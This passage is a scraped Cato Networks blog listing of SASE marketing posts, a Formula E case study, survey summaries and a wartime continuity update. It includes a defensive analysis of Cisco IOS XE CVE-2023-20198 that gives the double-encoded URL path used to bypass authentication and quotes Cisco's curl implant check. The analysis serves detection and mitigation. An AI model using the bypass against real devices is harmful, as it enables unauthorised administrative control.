prevention, enterprise-class data protection, and timely incident detection and response.  Today’s Times Square takeover is more than a marketing stunt; it’s a glimpse into the future of network security. Tomorrow’s security must be as bold and brash as Times Square, empowering IT to lead the company through any business challenge and transformation. That’s what you get with the Cato SASE Cloud -- today. Enterprises worldwide have access to a network security solution that is agile, scalable, and simple to manage, while meeting the demands of an always-changing digital landscape.   Want to learn why thousands of companies have already secured their future with Cato? Visit us at catonetworks.com/customers/. If you are looking to be part of the biggest shift in IT since the Cloud, join us at https://www.catonetworks.com/contact-us

Addressing CxO Questions About SASE

A New Reality The nature of the modern digital business is constantly and rapidly evolving, requiring network and security architectures to move at the same... Read ›
Addressing CxO Questions About SASE A New Reality The nature of the modern digital business is constantly and rapidly evolving, requiring network and security architectures to move at the same speed.  Moving at the speed of business demands a new architecture that is agile, flexible, highly scalable, and very secure to keep pace with dynamic business changes.  In short, this requires SASE.  However, replacing a traditional architecture in favor of a SASE cloud architecture to meet these demands can introduce heart-stopping uncertainty in even the most forward-thinking CxOs. Most CxOs understand what SASE delivers; some can even envision their SASE deployment. However, they require more clarity about SASE approaches, requirements, and expectations.  The correct SASE decision delivers long-term success; conversely, the wrong decision adversely impacts the organization.  Avoiding this predicament requires due diligence, asking tough questions, and validating their use cases and business objectives. Understanding the right questions to ask requires understanding the critical gaps in the existing architecture to visualize the desired architecture.  Asking the right questions requires clarity on the problems the business is trying to solve.  Considerations like new security models, required skills, or potential trade-offs should be addressed before any project begins. We’ll  answer some of those questions and highlight how the right SASE cloud solution delivers benefits beyond architectural simplicity and efficiency. Answering CxO Questions Determining which questions are relevant enough to influence a buying decision and then acting on them can be exhausting.  This blog addresses those concerns to clarify SASE’s ability to solve common use cases and advance business goals.  While the following questions only represent a small set of the possible questions asked by CxOs, they help crystalize the potential of a SASE Cloud solution to address critical questions and use cases while assuaging any concerns. Does this fit our use cases, and what do we need to validate? A key decision point for many CxOs is whether or not the solution solves their most pressing use cases.  So, understanding what’s not working, why it’s not working, and what success looks like when it is working provides them with their north star, per se, as guidance.  One would assume that answering this question is quite easy; however, looking closer we find the answers are rather subjective. Through our engagements with customers, we’ve found that use cases tend to fall into one of three broad categories: 1. Network & security consolidation/simplification Point solutions to address point problems yields appliance sprawl. This has created security gaps and sent management support costs through skyrocketing.  This makes increasing IT spending harder to justify to the board, pushing more CxOs to explore alternatives amid shrinking budgets. SASE is purpose-built to consolidate and simplify network and security architectures.  The right SASE Cloud solution delivers a single, converged software stack that consolidates network, access, and security into one, thus eliminating solution sprawl and security gaps.  Additionally, it eliminated day-to-day support tasks, thus delivering a high ROI. 2. Secure Access/Work-From-Anywhere Covid-19 accelerated a new working model for modern digital enterprises.  Hybrid work became the rule more than an exception, increasing secure remote access requirements. SASE makes accommodating this and other working model easy to facilitate while ensuring productivity and consistent security everywhere. 3. Cloud Optimization & Security As hybrid and multi-cloud becomes a core business & technology strategy, performance and security demands have increased.  Organizations require compatible performance and security in the cloud as they received on-premise. SASE improves cloud performance and provides consistent security enforcement for hybrid and multi-cloud environments. The right SASE cloud approach addresses all common and complex use cases, thus becoming a clear benefit for modern enterprises. [boxlink link="https://www.catonetworks.com/resources/sase-as-a-gradual-deployment-the-various-paths-to-sase/"] SASE as a Gradual Deployment: The Various Paths to SASE | Get the eBook [/boxlink] How can we align architecturally with this new model? What will our IT operations look like? Can we inspire the team to develop new skills to fit this new IT model? When moving to a 100% cloud-delivered SASE solution, it is logical to question the level of cloud expertise required.  Can IT teams easily adapt to support a SASE cloud solution?  How can we efficiently align to build a more agile and dynamic IT organization? The average IT technologist joined the profession envisioning strategic thought-provoking projects that challenged their creative and innovative prowess.  SASE cloud solutions enable these technologists to realize this vision while allowing organizations to think differently about how IT teams support the overall business.  Traditional activities like infrastructure and capacity planning, updating, patching, and fixing now fall to the SASE cloud provider since they own the network infrastructure.  Additionally, SASE cloud strengthens NOC and SOC operations with 360-degree coverage for network and security issues.  The right SASE cloud platform offloads these mundane operational tasks that typically frustrates IT personnel and leads to burn out. IT teams can now focus on more strategic projects that drive business by offloading common day-to-day support tasks to their SASE Cloud provider. How can all security services be effectively delivered without an on-premises appliance?  What are the penalties/risks if done solely in the cloud? Traditional appliances fit nicely into IT comfort zones.  You can see it and touch it, so moving all security policies to the cloud can be scary.  Some will question if it makes sense to enforce all policies in the cloud and whether this will provide complete security coverage.  These questions try to make sense of SASE, highlighted by a fear of the architectural unknown. There is a reason most CxOs pursue SASE solutions.  They’ve realized that current network architectures are unsustainable and require a bit of sanity.  The right SASE Cloud platform provides this through the convergence of access, networking, and security into a single software stack.  All technologies are built into a single code base and collaborate to deliver more holistic security.  And, with a global private network of SASE PoPs, SASE Cloud delivers consistent policy enforcement everywhere the user resides.  This simple method of delivering Security-as-a-Service makes sense to them. What will this deployment journey be like, and how simple will it be? Traditional network and security deployments are extremely complex.  They require hardware everywhere, extended troubleshooting, and other unknown risks.  These include integrating cloud environments; ensuring cloud and on-premise security policies are consistent; impact on normal operations; and licensing and support contracts, just to name a few. Mitigating risks inherent with on-premises deployments is top-of-mind for most CxOs. SASE cloud solution deployments are straightforward and simple with most customers gaining a very clear idea of this during their POC.  The POC provides customers with deep insight into common SASE cloud deployment practices and ease of configuration, and they gain clarity for their journey based on their use cases.  Best of all, they see how the solution works in their environment and, more importantly, how the SASE cloud solution integrates into their existing production network.  This helps alleviate any concerns for their new SASE journey. What, if any, are the quantitative and qualitative compromises of SASE?  How do we manage them? CxOs face daunting, career-defining dilemmas when acquiring new technologies, and SASE is no different. They must determine how to prioritize and find necessary compromises when needed.  Traditional solution deployments are sometimes accompanied by unexpected costs associated with ancillary technology or resource requirements. For example, how would they manage a preferred solution if they later find it unsuitable for certain use cases?  Do they move forward with their purchase?  Do they select another knowing it may fail to address a different set of use cases? While priorities and compromises are subjective, it helps to identify potential trade-offs by defining the “must-have”, “should-have”, and “nice-to-have” requirements for a particular environment.  Working closely with your SASE cloud vendor during the POC, you will test and validate your use cases against these requirements.  In the end, customers usually find that the right SASE cloud solution will meet their common and complex access, network, and security use cases. How do we get buy-in from the board? SASE is just as much a strategic business conversation as an architectural one.  How a CxO approaches this – what technical and business use cases they map to, their risk-mitigating strategy, and their path to ROI – will determine their overall level of success.  So, gaining board-level buy-in is an important and possibly, the most critical part of their process. CxOs must articulate the strategic business benefits of converging access, networking, and security functions into a single cloud-native software stack with unlimited scalability to support business growth.  An obvious benefit is how SASE accelerates and optimizes access to critical applications and enhances security coverage while improving user experiences and efficiency. CxOs can also consult our blog, Talk SASE To Your Board, for board conversation tips. Cato SASE Cloud is the Answer A key advantage of Cato SASE Cloud is that it solves the most common business and technical use cases.  Mapping the SASE cloud solution into these use cases and testing them during a POC will uncover the must/should/nice-to-have requirements and help customers visualize solving them with a SASE cloud solution. CxOs and other technology business leaders will naturally have questions about SASE and how to approach potential migration. SASE changes the networking and security game, so embarking upon this new journey requires changing minds. Cato SASE Cloud represent the new secure digital platform of the future that is best positioned to allow enterprises to experience business transformation without limits. For more advice on deciding which solution is right for your organization, please read this article on evaluating SASE capabilities.

Cisco IOS XE Privilege Escalation (CVE-2023-20198) – Cato’s analysis and mitigation

By Vadim Freger, Dolev Moshe Attiya, Shirley Baumgarten All secured webservers are alike; each vulnerable webserver running on a network appliance is vulnerable in its... Read ›
Cisco IOS XE Privilege Escalation (CVE-2023-20198) – Cato’s analysis and mitigation By Vadim Freger, Dolev Moshe Attiya, Shirley Baumgarten All secured webservers are alike; each vulnerable webserver running on a network appliance is vulnerable in its own way. On October 16th 2023 Cisco published a security advisory detailing an actively exploited vulnerability (CVE-2023-20198) in its IOS XE operating system with a 10 CVSS score, allowing for unauthenticated privilege escalation and subsequent full administrative access (level 15 in Cisco terminology) to the vulnerable device.After gaining access, which in itself is already enough to do damage and allows full device control, using an additional vulnerability (CVE-2023-20273) an attacker can elevate further to the “root” user and install a malicious implant to the disk of the device. When the initial announcement was published Cisco had no patched software update to provide, and the suggested mitigations were to disable HTTP/S access to the IOS XE Web UI and/or limiting the access to it from trusted sources using ACLs and approx. a week later patches were published and the advisory updated.The zero-day vulnerability was being exploited before the advisory was published, and many current estimates and scanning analyses put the number of implanted devices in the tens of thousands. [boxlink link="https://www.catonetworks.com/rapid-cve-mitigation/"] Rapid CVE Mitigation by Cato Security Research [/boxlink] Details of the vulnerability The authentication bypass is done on the webui_wsma_http or webui_wsma_https endpoints in the IOS XE webserver (which is running OpenResty, an Nginx variant that adds Lua scripting support). By using double-encoding (a simple yet clearly effective evasion technique) in the URL of the POST request it bypasses checks performed by the webserver and passes the request to the backend. The request body contains an XML payload which the backend executes arbitrarily since it’s considered to pass validations and comes from the frontend.In the request example below (credit: @SI_FalconTeam) we can see the POST request along with the XML payload is sent to /%2577ebui_wsma_http, when %25 is the character “%” encoded, followed by 77, and combined is “%77” which is the character “w” encoded. Cisco has also provided a command to check the presence of an implant in the device, by running: curl -k -X POST "https[:]//DEVICEIP/webui/logoutconfirm.html?logon_hash=1", replacing DEVICEIP and checking the response, if a hexadecimal string is returned an implant is present. Cato’s analysis and response to the CVE From our data and analysis at Cato’s Research Labs we have seen multiple exploitation attempts of the CVE, along with an even more interesting case of Cisco’s own SIRT (Security Incident Response Team) performing scanning of devices to detect if they are vulnerable, quite likely to proactively contact customers running vulnerable systems.An example of scanning activity from 144.254.12[.]175, an IP that is part of a /16 range registered to Cisco. Cato deployed IPS signatures to block any attempts to exploit the vulnerable endpoint, protecting all Cato connected sites worldwide from November 1st 2023.Cato also recommends to always avoid placing critical networking infrastructure to be internet facing. In instances when this is a necessity, disabling HTTP access and proper access controls using ACLs to limit the source IPs able to access devices must be implemented. Networking devices are often not thought of as webservers, and due to this do not always receive the same forms of protection e.g., a WAF, however their Web UIs are clearly a powerful administrative interface, and we see time and time again how they are exploited. Networking devices like Cisco’s are typically administered almost entirely using CLI with the Web UI receiving less attention, somewhat underscoring a dichotomy between the importance of the device in the network to how rudimentary of a webserver it may be running. https://www.youtube.com/watch?v=6caLf-1KGFw&list=PLff-wxM3jL7twyfaaYB7jxy6WqDB_17V4

SSE Is a Proven Path for Getting To SASE

Modern enterprise complexity is challenging cybersecurity programs. With the widespread adoption of cloud services and remote work, and the broadening distribution of applications and employees... Read ›
SSE Is a Proven Path for Getting To SASE Modern enterprise complexity is challenging cybersecurity programs. With the widespread adoption of cloud services and remote work, and the broadening distribution of applications and employees away from traditional corporate locations, organizations require a more flexible and scalable approach to network security. SASE technology can help address these issues, making SASE adoption a goal for many organizations worldwide. But adoption paths can vary widely. To get an understanding of those adoption paths, and the challenges along the way, the Enterprise Strategy Group surveyed nearly 400 IT and cybersecurity professionals to learn of their experiences. Each survey respondent is in some way responsible for evaluating, purchasing, or managing network security technology products and services. One popular strategy is to ease into SASE by starting with security service edge (SSE), a building block of SASE which integrates security capabilities directly into the network edge, close to where users or devices connect. Starting with SSE necessitates having an SSE provider with a smooth migration path to SASE. Relying on multiple vendors leads to integration challenges and deployment issues. The survey report, SSE Leads the Way to SASE, outlines the experiences of these security adopters of SSE/SASE. The full report is available free for download. Meanwhile, we’ll summarize the highlights here. Modernization Is Driving SASE Adoption At its core, SASE is about the convergence of network and security technology. But even more so, it’s about modernizing technologies to better meet the needs of today’s distributed enterprise environment. Asked what’s driving their interest in SASE, respondents’ most common response given is supporting network edge transformation (30%). This makes sense, considering the network edge is no longer contained to branch offices. Other leading drivers include improving security effectiveness (29%), reducing security risk (28%), and supporting hybrid work models (27%). There are numerous use cases for SASE The respondents list a wide variety of initial use cases for SASE adoption—everything from modernizing secure application access to supporting zero-trust initiatives. One-quarter of all respondents cite aligning network and security policies for applications and services as their top use case. Nearly as many also cite reducing/eliminating internet-facing attack surface for network and application resources and improving remote user security. The report groups the wide variety of use cases into higher level themes such as improving operational efficiency, supporting flexible work models, and enabling more consistent security. [boxlink link="https://www.catonetworks.com/resources/enterprise-strategy-group-report-sse-leads-the-way-to-sase/"] Enterprise Strategy Group Report: SSE Leads the Way to SASE | Get the Report [/boxlink] Security Teams Face Numerous Challenges One-third of respondents say that an increase in the threat landscape has the biggest impact on their work. This is certainly true as organizations’ attack surfaces now extend from the user device to the cloud. The Internet of Things and users’ unmanaged devices pose significant challenges, as 31% of respondents say that securely connecting IoT devices in our environment is a big issue, while 29% say it’s tough to securely enable the use of unmanaged devices in our environment. 31% of respondents are challenged by having the right level of security knowledge, skills, and expertise to fight the good fight. Overall, 98% of respondents cite a challenge of some sort in terms of securing remote user access to corporate applications and resources. More than one-third of respondents say their top remote access issue is providing secure access for BYOD devices. Others are vexed by the cost, poor security, and limited scalability of VPN infrastructure. What’s more, security professionals must deal with poor or unsatisfactory user experiences when having to connect remotely. Companies Ease into SASE with SSE To tame the security issues, respondents want a modern approach that provides consistent, distributed enforcement for users wherever they are, as well as a zero-trust approach to application access, and centralized policy management. These are all characteristics of SSE, the security component of SASE. Nearly three-quarters of respondents are taking the path of deploying SSE first before further delving into SASE. SSE is not without its challenges, for example, supporting multiple architectures for different types of traffic, and ensuring that user experience is not impacted. Ensuring that traffic is properly inspected via proxy, firewall, or content analysis and in locations as close to the user as possible is critical to a successful implementation. ESG’s report outlines the important attributes security professionals consider when selecting an SSE solution. Top of mind is having hybrid options to connect on-premises and cloud solutions to help transition to fully cloud-delivered over time. Respondents Outline Their Core Security Functions of SSE While organizations intend to eventually have a comprehensive security stack in their SSE, the top functions they are starting with are: secure web gateway (SWG), cloud access security broker (CASB), zero-trust network access (ZTNA), virtual private network (VPN), SSL decryption, firewall-as-a-service (FWaaS), data loss prevention (DLP), digital experience management (DEM), and next-generation firewall (NGFW). Turning SSE into SASE is the Goal While SSE gets companies their security stack, SASE provides the full convergence of security and networking. And although enterprise IT buyers like the idea of multi-sourcing, the reality is that those who have gone the route of multi-vendor SASE have not necessarily done so by choice. A significant number of respondents say they simply feel stuck with being multi-vendor due to lock-in from recent technology purchases, or because of established relationships. Despite the multi-vendor approach some companies will take, many of the specific reasons respondents cite for their interest in SSE would be best addressed by a single-vendor approach. Among them are: improving integration of security controls for more efficient management, ensuring consistent enforcement and protection across distributed environments, and improving integration with data protection for more efficient management and operations—all of which can come about more easily by working with just one SSE/SASE vendor. It eliminates the time and cost of integration among vendor offerings and the “finger pointing” when something goes wrong. Even Companies in Early Stages are Realizing Benefits Most respondents remain in the early stages of their SSE journey. However, early adopters are experiencing success that should help others see the benefits of the architecture. For example, 60% say that cybersecurity has become somewhat or much easier than it was two years ago. Those who have started the SASE journey have realized benefits, too. Nearly two-thirds report reduced costs across either security solutions, network solutions, security operations, or network operations. Similarly, 62% cite efficiency benefits of some kind, such as faster problem resolution, ease of management, faster onboarding, or reduction in complexity. Proof points like these should pique the interest of any organization thinking about SASE and SSE. View the full survey report, SSE Leads the Way to SASE, here.

6 Steps for CIOs To Keep Their IT Staff Happy

According to a recent Yerbo survey, 40% of IT professionals are at high risk of burnout. In fact, and perhaps even more alarming, 42% of... Read ›
6 Steps for CIOs To Keep Their IT Staff Happy According to a recent Yerbo survey, 40% of IT professionals are at high risk of burnout. In fact, and perhaps even more alarming, 42% of them plan to quit their company in the next six months. And yet, according to Deloitte, 70% of professionals across all industries feel their employers are not doing enough to prevent or alleviate burnout. CIOs should take this statistic seriously. Otherwise, they could be dealing with the business costs of churn, which include loss of internal knowledge and the cost of replacing employees, both resulting in putting strategic plans on hold. So, what’s a CIO to do? Here are six steps ambitious CIOs like you can take to battle burnout in the IT department and keep their staff happy. This blog post is a short excerpt of the eBook “Keeping Your IT Staff Happy: How CIOs Can Turn the Burnout Tide in 6 Steps”. You can read the entire eBook, with more details and an in-depth action plan, here. Step 1: Let Your Network Do the Heavy Lifting If your IT team is receiving negative feedback from users, they might be feeling stressed out. Poor network performance, security false positives and constant user complaints can leave them feeling dread and anxiety about that next “emergency” phone call. SASE can help ease this pressure. SASE provides reliable global connectivity with optimized network performance, 99.999% uptime and a self-healing architecture that ensures employees can focus on advancing the business, instead of tuning and troubleshooting network performance. With SASE, IT managers can provide a flawless user experience and business continuity, while enjoying a silent support desk. [boxlink link="https://www.catonetworks.com/resources/keep-your-it-staff-happy/"] Keep your IT Staff happy: How CIOs Can Turn the Burnout Tide in 6 Steps | Get the eBook [/boxlink] Step 2: Leverage Automation to Maximize Business Impact IT professionals are often caught in a cycle of mundane activities, leaving them feeling unchallenged. Instead of having IT teams fill the time with endless maintenance and monitoring, CIOs can focus their IT teams on work that achieves larger business objectives. SASE automates repetitive tasks, which frees up IT to focus on strategic business objectives. In addition, the repetitive tasks become less prone to manual errors. Step 3: Eliminate Networking and Security Solution Sprawl with Converged SASE IT teams are swamped with point solutions, each corresponding to a specific, narrow business problem. All of these solutions create a complicated mix of legacy machines, hardware and software; which are difficult for IT to operate, maintain, support and manage.  With SASE, CIOs can transform their network into a single platform with a centralized management application. IT can now gain a holistic view of their architecture, and enjoy easy management and maintenance. Step 4: Ensure Business Continuity and Best-in-class Security with ZTNA Working from anywhere has doubled IT’s workload. They are now operating in reactive mode, attempting to support end-user connectivity and security through VPNs that were not built to support such scale.  SASE is the answer for remote work, enabling users to work seamlessly and securely from anywhere. Eliminating VPN servers removes the need to backhaul traffic and improves end-user performance. Traffic is authenticated with Zero Trust and inspected with advanced threat defense tools to reduce the attack surface. Step 5: Minimize Security Vulnerabilities Through Cloudification and Consolidation Global branches, remote work, and countless integrations between network and security point products have created an expanding attack surface. For IT, this means fighting an uphill battle without the tools they need to win.  A SASE or SSE solution helps IT apply consistent access policies, avoid misconfigurations and achieve regulatory compliance. This also allows them to prevent cyber attacks in real time and helps the organization remain secure and prevent compliance issues. Step 6: Bridge Your Team’s Skillset Gap and Invest in Their Higher Education Skills gaps occur for a number of reasons. Whatever the reason, this can leave your IT team members feeling overwhelmed and professionally unfulfilled, resulting in them leaving the organization. Providing training and professional development helps IT professionals succeed, which in turn, may motivate them to remain in their roles longer, according to a recent LinkedIn survey. These benefits are felt everywhere and by everyone from the IT professional who receives more at-work satisfaction, to CIOs who don’t have to backfill the skills gaps externally. This enables the organization to achieve ambitious plans for growth and business continuity through technology.To read more about how CIOs can tackle IT burnout head on, click here to access the full eBook.

The PoP Smackdown: Cato vs. Competitors…Which Will Dominate Your Network?

In the world of professional wrestling, one thing separates the legends from the rest: their presence in the ring. Like in wrestling, the digital world... Read ›
The PoP Smackdown: Cato vs. Competitors…Which Will Dominate Your Network? In the world of professional wrestling, one thing separates the legends from the rest: their presence in the ring. Like in wrestling, the digital world demands a robust and reliable presence for the ultimate victory. Enter Cato Networks, the undisputed champion regarding Secure Access Service Edge (SASE) Points of Presence (PoPs). In this blog post, we'll step into the ring and discover why Cato Networks stands tall as the best SASE PoP provider, ensuring businesses are always secure and connected. SASE providers will talk about and even brag about their points of presence (PoPs) because it is the underlying foundation of their backbone network. But if you look a little closer, you will see that not all PoPs are the same and that the PoP capabilities vary greatly. A point of presence is a data center containing specific components that allow the traffic to be inspected and enforce security. Sounds easy enough. It depends on how those PoPs are designed to function and where the PoPs are located to be of the most value to your organization. Let’s look at the competition—first, the heavyweight hardware contender, Fortinet. Fortinet has twenty-two PoPs globally. Fortinet relies on its customer install base to do the networking and security inspection at every location globally. This adds complexity and multiple caveats to their SASE solution. The added complexity comes from managing numerous products, keeping them up to date with software and patches, and ensuring they are all configured correctly to enable the best possible protection. [boxlink link="https://www.catonetworks.com/resources/take-the-global-backbone-interactive-tour/"] Take the Global Backbone Interactive Tour | Start the Tour [/boxlink] Next, the challenger to the heavyweight title, Palo Alto Networks. They claim many PoPs, but you need to look deeper at where those PoPs are hosted. The vast majority of PANs Prisma Access PoPs are in Google Cloud Platform and some in Amazon Web Services. This adds cost and complexity, making the solution more difficult to manage. Additionally, if you want to use multiple security features, your data will probably have to be forwarded to various PoPs to get full coverage…impacting performance. Since Palo Alto utilizes the public cloud infrastructure, many of the claimed PoPs are just on-ramps to the Google fiber backbone. This is not the best option if you are trying to balance connectivity, security, and cost. Finally, we have Cato Networks. Cato has an impressive 80+ PoPs that are connected via Tier 1 ISPs, creating the world's largest full-mesh SASE-focused private backbone network.  At Cato, all our security capabilities are available from every single PoP worldwide. Since Cato’s PoPs are cloud-native and purpose-built for security and networking functionality, it allows Cato to be highly agile and straightforward to manage…regardless of where your organization has its locations. Speaking of location, Cato has strategically placed our PoPs closest to major business centers all over the globe, including three PoPs in China, and new PoPs are added every quarter based on demand and customer requirements. In the world of wrestling, champions rise to the occasion with unmatched presence and skills. Cato Networks proves itself as the ultimate champion in the realm of SASE with the best PoPs. With a global reach, low latency, battle-tested security, simplified management, cost-efficiency, and always-on connectivity, Cato Networks ensures your business operates securely and efficiently like a wrestling legend in the ring. So, if you are looking for the best SASE PoPs, look no further – Cato Networks is the undisputed champion!

Rocking IT Success: The TAG Heuer Porsche Formula E Team’s City-Hopping Tour with SASE TAG Heuer Porsche Formula E Team

Picture this: A rock band embarking on a world tour, rocking stages in different cities with thousands of adoring fans. But wait, behind the scenes,... Read ›
Rocking IT Success: The TAG Heuer Porsche Formula E Team’s City-Hopping Tour with SASE TAG Heuer Porsche Formula E Team Picture this: A rock band embarking on a world tour, rocking stages in different cities with thousands of adoring fans. But wait, behind the scenes, there's an unsung hero—the crew. They're the roadies, the ones responsible for building the infrastructure that supports the band's electrifying performances in each new location. Now, let's take that same analogy and apply it to the TAG Heuer Porsche Formula E Team. We invited Friedemann Kurz, Head of IT at Porsche Motorsport, to a special webinar where we discussed how technology drives these races and IT’s key role. Join us as we dive into the IT requirements faced by this cutting-edge racing team and how SASE (Secure Access Service Edge) rises to the occasion, ensuring a flawless journey from one city to another. Top IT Requirements The TAG Heuer Porsche Formula E Team’s IT team faces a number of networking challenges. Surprisingly (or not) these challenges are not that different from the challenges faced by IT teams across all organizations. From battery energy to braking points, and time lost for Attack Mode, the IT support team at the Porsche test and development center in Weissach and trackside will work in parallel to process approximately 300 GB of data on one Cato Networks dashboard to make time critical decisions. Some of these challenges include: Finding the Right Products The TAG Heuer Porsche Formula E Team’s IT provides services in a high-pressure environment -- and expectations are high. On-track, the IT team is limited in size, so each person needs to be able to operate all IT-related aspects, from network to storage to layers one to five to end-to-end monitoring. This makes choosing the right products and technologies key to their success. Operational Efficiency With so many actions happening simultaneously during the race, IT needs to be able to focus on the issues that matter most. This requires in-depth monitoring that is easy-to-use and the ability to fix issues instantly. Security Security needs to be built-in to the solution to ensure it doesn’t require additional effort from the team. Security is a key success factor, meaning all IT team members focus on security, rather than having a dedicated security person. Easy Deployment The TAG Heuer Porsche Formula E Team operates worldwide, but they only spend a few days at each global site. Every time they arrive at a new city, IT needs to quickly deploy networking and security from scratch (with no existing infrastructure) and pack it up after the race. This whole process only takes a few days, so it has to be efficient and quick. In addition, the rest of the team arrives on site at the same time as the IT team, demanding connectivity immediately. [boxlink link="https://catonetworks.easywebinar.live/registration-simplicity-at-speed"] Simplicity at Speed: How Cato’s SASE Drives the TAG Heuer Porsche Formula E Team’s Racing | Watch the Webinar [/boxlink] IT Capabilities Required to Win Races Why is the IT team a key component in the TAG Heuer Porsche Formula E Team’s success? Here are a few of the networking and security capabilities they rely on: Data Analysis Races are a data-driven and data-intensive event, with large amounts of data being transmitted back and forth across the global network. For example, the TAG Heuer Porsche Formula E Team downloads the car and racetrack data after the races. Then, the engineers in the operations room at the team’s headquarters analyze the data for improving the team’s setup and strategy. Real-Time Communication During the races, the team relies on global real-time communication. It is the most critical way of communication between the driver, the support engineers and the operations room. This means that real-time packages that are transmitted across the WAN need to be optimized to ensure quality of services. Driver in the Loop The TAG Heuer Porsche Formula E Team’s success relies on large-scale mathematical models that use the data to find better racing setups and strategies. Their focus is on the energy use formula, since, ideally, drivers complete the races with zero battery left. Zero battery means it was the most efficient race. The ability to calculate these formulas is based on data that is transferred back and forth between the track and the headquarters. Ransomware Protection The sports industry has been targeted by cyber attackers in the past with ransomware and other types of attacks. To protect their ability to make decisions during races, the TAG Heuer Porsche Formula E Team needs a security solution that protects them and their ability to access their data from ransomware attacks. Since data is the cornerstone of their strategy and key for their decision-making, safeguarding access to the data is top priority. How Cato’s SASE Changed the Game To answer these needs, the TAG Heuer Porsche Formula E Team partnered with Cato Networks. Cato Networks was chosen as the team’s official SASE partner. Cato Networks helps transmit large volumes of data in real-time from 20 global sites. Before working with Cato Networks, the TAG Heuer Porsche Formula E Team used VPNs. This introduced security, configuration and maintenance challenges. Now, maintenance and effort have significantly decreased. One IT member on-site can oversee, manage and monitor the entire network during the races independently and flexibly. In addition, Cato delivered: Fast implementation - from 0 to 100% in two weeks. Simplified and efficient operations. Quick response times. Personal and open-minded support. To hear more from Friedemann Kurz, Head of IT at Porsche Motorsport, watch the webinar here.

Networking and Security Teams Are Converging, Says SASE Adoption Survey 

Converging networking with security is fundamental to creating a robust and resilient IT infrastructure that can withstand the evolving cyber threat landscape. It not only... Read ›
Networking and Security Teams Are Converging, Says SASE Adoption Survey  Converging networking with security is fundamental to creating a robust and resilient IT infrastructure that can withstand the evolving cyber threat landscape. It not only protects sensitive data and resources but also contributes to the overall success and trustworthiness of an organization.   And just as technologies are converging, networking and security teams are increasingly working together. In our new 2023 SASE Adoption Survey, nearly a quarter (24%) of respondents indicate security and networking are being handled by one team.    For those with separate teams, management is focusing on improving collaboration between networking and security teams. In some cases (8% of respondents), this takes the form of creating one networking and security group. In most cases, (74% of respondents) indicate management has an explicit strategy that teams must either work together or have shared processes.  The Advantages of Converging the Networking and Security Teams  When network engineers and security professionals work together, they share knowledge and insights, leading to improved efficiency and effectiveness in addressing network security challenges.  By integrating networking and security functions, companies can gain better visibility into network traffic and security events. Networking teams possess in-depth knowledge of network infrastructure, which security researchers often lack. By providing security teams with network information, organizations can hunt and remediate threats more effectively.  [boxlink link="https://www.catonetworks.com/resources/unveiling-insights-2023-sase-adoption-survey/"] Unveiling Insights: 2023 SASE Adoption Survey | Get the Report [/boxlink] Closer collaboration enables quicker and more effective incident resolution, reducing the impact of cyber threats on business operations. Furthermore, by working together, the organization can optimize the performance of network resources while maintaining robust security measures, providing a seamless user experience without compromising protection.   There are other benefits, too, like streamlined operations, faster incident response, a holistic approach to risk management, and cost savings. All these advantages of a converged team help organizations attain a stronger security posture.  There’s a Preference for One Team, One Platform  Bringing teams together also enables the organization to implement security measures during network design and configuration, ensuring that security is an inherent part of the network architecture from the beginning.    Many organizations today (68%) use different platforms for security and networking management and operations. However, most (76%) believe that using just one platform for both purposes would improve collaboration between the networking and security teams. More than half also want a single data repository for networking and security events.  The preference for security and networking to work together extends to SASE selection. Which team leads on selecting a SASE solution—the networking or the security team? In most cases, it’s both.   When it comes to forming a SASE selection committee, about half (47% of respondents) say it’s a security team project with the networking team involved as necessary. Another 39% flip that script, with the networking team leading the project and involving the security team to vet the vendors.   As the teams come together, it makes great sense they would prefer to use a single, unified platform for their respective roles. Most respondents (62%) say having a single pane of glass for managing security and networking is an important SASE purchasing factor. More than half (54%) also want a single data repository for networking and security events.  Security and Networking Team Convergence Calls for Platform Convergence  Regardless, an effective SASE platform needs to accommodate the needs of all organizational structures whether teams are distinct or together. Essential in that role is rich role-based access control (RBAC) that allows granular access to various aspects of the SASE platform. In this way, IT organizations can create roles that reflect their unique structure – whether teams are converged or distinct. (Cato recently introduced RBAC+ for this reason. You can learn more here.)  As for SASE adoption, a single vendor approach was the most popular (63% of respondents). Post deployment would those who deployed SASE stay with the technology? The vast major (79% of respondents) say, “Yes.”   Additional finding from the survey shed light on   Future plans for remote and hybrid work   Current rate of SASE adoption  How to ensure security and performance for ALL applications  ..and more. To learn more, download the report results here. 

Business Continuity at Difficult Times of War in Israel

As reported in global news, on October 7th, 2023, the Hamas terror organization has launched a brutal attack on Israeli cities and villages, with thousands... Read ›
Business Continuity at Difficult Times of War in Israel As reported in global news, on October 7th, 2023, the Hamas terror organization has launched a brutal attack on Israeli cities and villages, with thousands of civilian casualties, forcing Israel to enter a state of war with Hamas-controlled Gaza. While Cato Networks is a global company with 850+ employees in over 30 countries around the world, a significant part of our business and technical operations is based out of Tel Aviv, Israel. The following blog details the actions we are taking based on our Business Continuity Procedures (BCP), adjusted to the current scenario, to ensure the continuity of our services that support our customers’ and partners’ critical network and security infrastructure. Business Continuity by Design Our SASE service was built from the ground up as a fully distributed cloud-native solution. One of the key benefits of our solution architecture is that it does not have a single point of failure. Our operations teams have built and trained AI engines to identify signals of performance or availability degradation in the service and respond to them autonomously. This is part of our day-to-day cloud operations, and as a result, downtime in one or more of our PoPs does not disrupt our customers’ operations. Our SASE Cloud high-availability and self-healing have already been put to the test before, and proved itself. Our stock of Sockets has always been globally distributed across warehouses in North America, Europe and APJ. All our warehouses are fully stocked, and no shortage or long lead times is expected. In fact, we have been able to overcome global supply chain challenges before. 24x7x365 Support Our support organization is designed to always be there for our 2000+ enterprise customers, where and when they need us. We are committed to ensure that support availability to our customers remains intact even during adverse conditions like an armed conflict or a pandemic. We operate a global support organization from the United States, Canada, Colombia, United Kingdom, Northern Ireland, The Netherlands, Israel, Poland, Ukraine, Macedonia, Singapore, Philippines and Japan. All teams work in concert to deliver a 24/7/365 follow-the-sun service, making sure no support tickets are left unattended. Customers who require support should continue to contact us through our standard support channels, and will continue to receive the support levels they expect and deserve. BCP Activation in Israel The Cato SASE service is ISO 27001 and SOC2 certified as well as additional, global standards. A mandatory part of such certifications is to have Business Continuity Procedures (BCP) in place, practice them periodically, and improve or fine-tune as needed. Our BCP was not only tested synthetically, but was successfully activated during the COVID-19 epidemic. In March 2020, we moved our entire staff to work remotely. Using the ZTNA capabilities of Cato SASE Cloud, the transition was smooth, and no customers experienced any impact on the service availability, performance, and support. We have now re-activated the same BCP for our staff in Israel. Our technical organizations are able to securely connect remotely to our engineering, support, and DevOps systems and continue their work safely from their homes. Beyond BCP In the current situation, we are taking additional steps to further our increase our resiliency. October 8th, 2023: We have extended shifts of our support teams in 